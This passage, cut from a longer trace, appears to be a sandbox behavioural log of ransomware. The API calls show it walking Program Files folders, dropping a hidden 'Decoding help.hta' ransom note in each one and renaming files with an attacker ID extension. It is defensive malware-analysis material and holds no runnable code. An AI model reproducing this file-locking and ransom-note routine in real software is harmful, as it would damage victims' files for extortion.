Files\\Windows NT\\Accessories\\*.*") returned 47 [0040.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\", lpString2="WordpadFilter.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll" [0040.619] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll" [0040.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0040.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll" (normalized: "c:\\program files\\windows nt\\accessories\\wordpadfilter.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\WordpadFilter.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\accessories\\wordpadfilter.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.619] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x12f1fd30 | out: lpFindFileData=0x12f1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea54dff0, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xea54dff0, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x464289e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x3a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 0 [0040.619] FindClose (in: hFindFile=0x5d7e50 | out: hFindFile=0x5d7e50) returned 1 Thread: id = 255 os_tid = 0x92c [0040.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Icons\\*.*", lpFindFileData=0x1305fd30 | out: lpFindFileData=0x1305fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0042.036] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.036] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1305fd30 | out: lpFindFileData=0x1305fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.036] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.036] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.036] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1305fd30 | out: lpFindFileData=0x1305fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0042.036] FindClose (in: hFindFile=0x5d88d0 | out: hFindFile=0x5d88d0) returned 1 Thread: id = 256 os_tid = 0x99c [0040.621] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*", lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7e50 [0040.621] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.621] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.622] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.622] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.622] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0040.622] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0040.622] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0040.622] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0040.622] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.622] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US" [0040.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*.*" [0040.622] GlobalMemoryStatus (in: lpBuffer=0x1319fd10 | out: lpBuffer=0x1319fd10) [0040.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10970818, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ec [0040.623] CloseHandle (hObject=0x2ec) returned 1 [0040.623] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46672035, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x46672035, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x449faf50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll", cAlternateFileName="")) returned 1 [0040.623] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.623] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.623] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" [0040.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\decoding help.hta")) returned 0xffffffff [0040.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0040.623] WriteFile (in: hFile=0x2ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1319fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1319fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.624] CloseHandle (hObject=0x2ec) returned 1 [0040.624] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0040.625] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextService.dll") returned -1 [0040.625] lstrlenW (lpString="TableTextService.dll") returned 20 [0040.625] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.625] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="TableTextService.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" [0040.625] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" [0040.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0040.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextService.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservice.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.625] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d933d2, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72d933d2, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x6e10ff3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3f54, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceAmharic.txt", cAlternateFileName="")) returned 1 [0040.625] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.625] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" [0040.625] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0040.625] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceAmharic.txt") returned -1 [0040.625] lstrlenW (lpString="TableTextServiceAmharic.txt") returned 27 [0040.625] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0040.625] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.625] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.625] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="TableTextServiceAmharic.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" [0040.625] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" [0040.626] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0040.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextserviceamharic.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextserviceamharic.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.626] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a73731, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72a73731, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x6e8340d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x136bf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceArray.txt", cAlternateFileName="")) returned 1 [0040.626] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.626] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.626] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" [0040.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0040.626] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceArray.txt") returned -1 [0040.626] lstrlenW (lpString="TableTextServiceArray.txt") returned 25 [0040.626] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.626] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.626] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="TableTextServiceArray.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt" [0040.626] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt" [0040.626] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0040.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicearray.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceArray.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicearray.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.627] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8340d, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x6e8340d, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x6f1b985, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef486, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceDaYi.txt", cAlternateFileName="")) returned 1 [0040.627] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.627] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.627] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" [0040.627] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0040.627] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceDaYi.txt") returned -1 [0040.627] lstrlenW (lpString="TableTextServiceDaYi.txt") returned 24 [0040.627] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.627] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.627] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="TableTextServiceDaYi.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" [0040.627] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" [0040.627] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0040.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicedayi.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicedayi.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.628] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae5b48, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72ae5b48, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x72ada55, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x196b56, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedQuanPin.txt", cAlternateFileName="")) returned 1 [0040.628] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.628] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" [0040.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\Decoding help.hta" (normalized: "c:\\program files\\windows nt\\tabletextservice\\decoding help.hta")) returned 0x1 [0040.628] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextServiceSimplifiedQuanPin.txt") returned -1 [0040.628] lstrlenW (lpString="TableTextServiceSimplifiedQuanPin.txt") returned 37 [0040.628] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0040.628] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.628] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\", lpString2="TableTextServiceSimplifiedQuanPin.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" [0040.628] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" [0040.628] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0040.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.629] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x1319fd30 | out: lpFindFileData=0x1319fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b57f5f, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72b57f5f, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x736c12b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x160e36, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedShuangPin.txt", cAlternateFileName="")) returned 1 [0040.629] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0040.629] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned 52 [0040.629] lstrcatW (in: lpString1="\\\\?\\C:\\Program 